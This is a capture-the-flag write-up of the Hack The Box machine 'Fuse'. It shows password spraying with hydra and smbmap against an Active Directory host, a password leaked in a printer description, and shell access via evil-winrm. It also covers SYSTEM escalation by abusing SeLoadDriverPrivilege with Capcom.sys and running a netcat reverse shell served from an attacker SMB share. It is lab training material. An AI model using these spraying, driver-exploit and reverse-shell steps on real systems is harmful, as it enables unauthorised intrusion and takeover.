Hack The Box - Fuse Writeup
Fuse is a medium windows box by egre55.
Overview
The box starts with web-enumeration, where can find a couple of usernames. Using CeWL, we generate a wordlist out of words from the webpage and start a password-spraying-attack. This gives us valid credentials, however our account is setup in such way, that we have to change our password before logging in. We use smbpasswd to change our password. By checking out the smb-shares, we can see that a printer is installed, however no interesting files can be found. Continuing our enumeration with RPC, we find a password by enumerating the printers. Starting another password-spraying-attack with the found password, we get a working set of credentials, which we can use to get a shell using evil-winrm. With this shell we can now read user.txt.
In order to get root, we exploit the SeLoadDriverPrivilege of the user. For this we need to upload the vulnerable driver and the exploit to the machine and execute the exploit. This gives us arbitrary-code execution in the context of system. Using this we get a reverse-shell as nt authority\system and can read root.txt.
Information Gathering
Nmap
We begin our enumeration with a nmap scan for open ports.
root@darkness:~# nmap -sC -sV 10.10.10.193
Nmap scan report for 10.10.10.193
Host is up (0.044s latency).
Not shown: 988 filtered ports
PORT STATE SERVICE VERSION
53/tcp open domain?
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesnt have a title (text/html).
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-06-17 22:31:47Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: fabricorp.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: FABRICORP)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: fabricorp.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
Host script results:
|_clock-skew: mean: 2h32m59s, deviation: 4h02m30s, median: 12m58s
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: Fuse
| NetBIOS computer name: FUSE\x00
| Domain name: fabricorp.local
| Forest name: fabricorp.local
| FQDN: Fuse.fabricorp.local
|_ System time: 2020-06-17T15:34:05-07:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2020-06-17T22:34:08
|_ start_date: 2020-06-17T20:07:25
Enumeration
There are a lot of open ports, however 80 (http) is always interesting, so let us start here.
HTTP - Port 80
Let us start our web-enumeration by going to http://10.10.10.193.
Upon visiting the url, we get redirected to . Let us add this domain to our /etc/hosts file.
root@darkness:~# cat /etc/hosts
[...]
10.10.10.193 fabricorp.local fuse.fabricorp.local
Now let us access the webpage again.
Now accessing the url, we get access to the web-interface of PaperCut.
Let check out all the logs for the three dates that are available.
We get three usernames: pmerton, tlavel and bnielson.
We get another username sthompson and a interesting document: Fabricorp01.docx.
We get another two usernames bhult and administrator.
Let us add all these usernames to a wordlist that we can use later on.
root@darkness:~# cat users.txt
thompson
pmerton
tlavel
bnielson
bhult
administrator
After looking around on the web-interface a bit more, I have decided to use CeWL again to try and generate a wordlist for password-spraying.
Using CeWL to generate wordlists
We can use a tool called CeWL to grep all words from the website and use it as possible password-candidates.
root@darkness:~# cewl http://fuse.fabricorp.local/papercut/logs/html/index.htm --with-numbers --depth 3 -m 5 -w wl.txt
root@darkness:~# wc -l wl.txt
104 wl.txt
We define that all words with at least 5 characters (numbers possible) are added to the wordlist resulting into 104 possible password candidates.
Password spraying
We can now start our password-spraying attack with all the found usernames and possible password-candidates.
root@darkness:~# hydra -L users.txt -P wl.txt smb://10.10.10.193
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-11-07 12:52:33
[INFO] Reduced number of tasks to 1 (smb does not like parallel connections)
[DATA] max 1 task per 1 server, overall 1 task, 624 login tries (l:6/p:104), ~624 tries per task
[DATA] attacking smb://10.10.10.193:445/
[445][smb] host: 10.10.10.193 login: tlavel password: Fabricorp01
[445][smb] host: 10.10.10.193 login: bnielson password: Fabricorp01
[445][smb] host: 10.10.10.193 login: bhult password: Fabricorp01
1 of 1 target successfully completed, 3 valid passwords found
We get the password Fabricorp01 working for three users: tlavel, bnielson and bhult. Let us see if we find any interesting smb-shares.
SMB - Port 445
Let us try to list all shares for each user with smbmap:
root@darkness:~# for user in tlavel bnielson bhult; do smbmap -u $user -p Fabricorp01 -H 10.10.10.193; done
[!] Authentication error on 10.10.10.193
[!] Authentication error on 10.10.10.193
[!] Authentication error on 10.10.10.193
We do get an authentication error for all of the 3 users… Let us try smbclient.
root@darkness:~# smbclient -U tlavel -L //10.10.10.193/
Enter WORKGROUP\tlavel password: Fabricorp01
session setup failed: NT_STATUS_PASSWORD_MUST_CHANGE
root@darkness:~# smbclient -U bnielson -L //10.10.10.193/
Enter WORKGROUP\bnielson password:
session setup failed: NT_STATUS_PASSWORD_MUST_CHANGE
root@darkness:~# smbclient -U bhult -L //10.10.10.193/
Enter WORKGROUP\bhult password:
session setup failed: NT_STATUS_PASSWORD_MUST_CHANGE
Seems like we have valid credentials, but we have to change our current password to be able to login. Luckily, Kali has a tool for that smbpasswd.
Changing passwords with smbpasswd
We can now change the password of one of these users via smbpasswd.
root@darkness:~# smbpasswd -U tlavel -r 10.10.10.193
Old SMB password: Fabricorp01
New SMB password: Chr0nOs$!_
Retype new SMB password: Chr0nOs$!_
Password changed for user tlavel on 10.10.10.193
Now that we have changed the password for tlavel, we should be able to list the smb-shares.
root@darkness:~# smbclient -U tlavel -L //10.10.10.193/
Enter WORKGROUP\tlavel password: Chr0nOs$!_
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
HP-MFT01 Printer HP-MFT01
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
print$ Disk Printer Drivers
SYSVOL Disk Logon server share
SMB1 disabled -- no workgroup available
We are indeed able to list all shares. There seems to be a printer installed, however checking out the shares no interesting files can be found.
#!/usr/bin/env python3
import subprocess
from random import randint
password = b"Fabricorp01"
# Use smbpasswd to change the password of the user
def change_pw(username, old_pw, password):
proc = subprocess.Popen([b"smbpasswd", b"-U", username, b"-r", b"10.10.10.193"], stdin=subprocess.PIPE)
proc.communicate(input=old_pw + b"\n" + password + b'\n' + password + b'\n')
users = [b"tlavel",b"bhult",b"bnielson"]
old_pw = password
password = b"Chr0nOs!_" + bytes([randint(33,126)]) # Valid ascii range 33-126
print(f"[+] Changing to: {password.decode()}")
for user in users:
change_pw(user,old_pw,password)
A quickly created a python script based on this stackoverflow thread to change the password of each of the three user, because it seems like the password is required to change about every minute.
root@darkness:~# python3 changePw.py
[+] Changed to: Chr0nOs_|
Old SMB password:
New SMB password:
Retype new SMB password:
Password changed for user tlavel on 10.10.10.193.
Old SMB password:
New SMB password:
Retype new SMB password:
Password changed for user bhult on 10.10.10.193.
Old SMB password:
New SMB password:
Retype new SMB password:
Password changed for user bnielson on 10.10.10.193.
Redo?
After some enumeration it seems like smb does not hold any interesting information for us.
RPC - Port 139
Let us enumerate RPC next.
root@darkness:~# rpcclient -U tlavel -r 10.10.10.193
Enter WORKGROUP\tlavel password: Chr0nOs_|
rpcclient $>
Let us start by getting a list of all users.
rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[svc-print] rid:[0x450]
user:[bnielson] rid:[0x451]
user:[sthompson] rid:[0x641]
user:[tlavel] rid:[0x642]
user:[pmerton] rid:[0x643]
user:[svc-scan] rid:[0x645]
user:[bhult] rid:[0x1bbd]
user:[dandrews] rid:[0x1bbe]
user:[mberbatov] rid:[0x1db1]
user:[astein] rid:[0x1db2]
user:[dmuir] rid:[0x1db3]
As we have seen previously that a printer is installed let us use enumprinters to check for any printer-config.
rpcclient $> enumprinters
flags:[0x800000]
name:[\\10.10.10.193\HP-MFT01]
description:[\\10.10.10.193\HP-MFT01,HP Universal Printing PCL 6,Central (Near IT, scan2docs password: $fab@s3Rv1ce$1)]
comment:[]
Seems like we have a password: $fab@s3Rv1ce$1. Now let us do a password-spraying attack once again.
root@darkness:~# cat full-users.txt
Administrator
Guest
krbtgt
DefaultAccount
svc-print
bnielson
sthompson
tlavel
pmerton
svc-scan
bhult
dandrews
mberbatov
astein
dmuir
We can now start the password-spraying attack using smbmap with a bash-loop or other tools like hydra or crackmapexec.
root@darkness:~# for user in $(cat full-users.txt); do echo "[*] Trying $user"...; smbmap -u $user -p '$fab@s3Rv1ce$1' -H 10.10.10.193; done | grep -v "error"
[*] Trying Administrator...
[*] Trying Guest...
[*] Trying krbtgt...
[*] Trying DefaultAccount...
[*] Trying svc-print...
[+] IP: 10.10.10.193:445 Name: fabricorp.local
[...]
[*] Trying bnielson...
[*] Trying sthompson...
[*] Trying tlavel...
[*] Trying pmerton...
[*] Trying svc-scan...
[+] IP: 10.10.10.193:445 Name: fabricorp.local
[...]
[*] Trying bhult...
[*] Trying dandrews...
[*] Trying mberbatov...
[*] Trying astein...
[*] Trying dmuir...
The password seems to work for both svc-print and svc-scan. We can try to get a shell by using evil-winrm now.
Getting user-shell
Let us try both users and see if we get a shell
root@darkness:~# evil-winrm -u svc-print -p '$fab@s3Rv1ce$1' -i 10.10.10.193
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc-print\Documents>
We get a shell using the svc-print account and can now read user.txt.
*Evil-WinRM* PS C:\Users\svc-print\Desktop> type user.txt
7edf6***************************
Privesc
Now that we have a shell as user, let us enumerate the system and find a privesc vector to root.
Enumeration as svc-print
Let us check out our privileges first.
*Evil-WinRM* PS C:\Users\svc-print\Desktop> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeLoadDriverPrivilege Load and unload device drivers Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
Googling for SeLoadDriverPrivilege exploit, we find this article, which explains how we can exploit this privilege using the Capcom.sys driver. I am going to use this exploit, simply because it is already precompile so I do not have to compile it myself and this Capcom.sys file.
Exploiting SeLoadDriverPrivilege
In order to exploit this vulnerability, we first have to upload the Capcom.sys driver and the exploit. Luckily evil-winrm does all the heavy lifting for us.
Evil-WinRM* PS C:\Users\svc-print\Documents> upload Capcom.sys
Info: Uploading Capcom.sys to C:\Users\svc-print\Documents\Capcom.sys
Data: 14100 bytes of 14100 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Users\svc-print\Documents> upload ExploitCapcom.exe
Info: Uploading ExploitCapcom.exe to C:\Users\svc-print\Documents\ExploitCapcom.exe
Data: 387752 bytes of 387752 bytes copied
Info: Upload successful!
Now that the files are uploaded we can run the exploit to learn how to use it.
*Evil-WinRM* PS C:\Users\svc-print\Documents> .\ExploitCapcom.exe
USAGE: 00000272A5966B70<LOAD/EXPLOIT> '<PATH/COMMAND>'
LOAD will load the vulnerable driver at PATH, EXPLOIT will run COMMAND
In order to exploit, we first have to load the driver and then define the command to be run.
*Evil-WinRM* PS C:\Users\svc-print\Documents> .\ExploitCapcom.exe LOAD C:\Users\svc-print\Documents\Capcom.sys
[*] Service Name: mptiyzkr`ùV
[+] Enabling SeLoadDriverPrivilege
[+] SeLoadDriverPrivilege Enabled
[+] Loading Driver: \Registry\User\S-1-5-21-2633719317-1471316042-3957863514-1104\????????????????????
NTSTATUS: 00000000, WinError: 0
*Evil-WinRM* PS C:\Users\svc-print\Documents>
We have successfully loaded the driver. Now we should be able to run arbitrary commands as system. For this we simply have to supply EXPLOIT "COMMAND" to the exploit-program. I am going to host nc.exe via smb using my SMBServ script.
root@darkness:~# smbserv -f /usr/share/windows-binaries/nc.exe
#####################
# Simple SMB-Server #
# By Chr0x6eOs #
#####################
Github: https://github.com/chr0x6eos
About:
A simple SMB-server running in docker.
By default current directory will be served.
[+] Smb-server (ID: 1466ac9ea9d7) started!
[+] DONE! :) Container (ID: 1466ac9ea9d7) is now running and serving...
Your files are available at:
\\172.17.0.1\share\
\\192.168.202.138\share\
\\127.0.0.1\share\
\\10.10.14.3\share\
Now that the smb-server is running, we can exploit the vulnerability and should get a reverse-shell as system.
*Evil-WinRM* PS C:\Users\svc-print\Documents> .\ExploitCapcom.exe EXPLOIT "\\10.10.14.3\share\nc.exe 10.10.14.3 443 -e powershell.exe"
[*] Capcom.sys exploit
[*] Capcom.sys handle was obtained as 0000000000000064
[*] Shellcode was placed at 000001CDA9B00008
[+] Shellcode was executed
[+] Token stealing was successful
[+] Command Executed
The command is executed, let us check back on our listener.
root@darkness:~# rlwrap nc -lvnp 443
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::443
Ncat: Listening on 0.0.0.0:443
Ncat: Connection from 10.10.10.193.
Ncat: Connection from 10.10.10.193:50367.
Windows PowerShell
Copyright (C) 2016 Microsoft Corporation. All rights reserved.
PS C:\Users\svc-print\Documents> whoami
nt authority\system
We get a shell as nt authority\system and can now read root.txt.
PS C:\Users\Administrator\Desktop> type root.txt
4a510***************************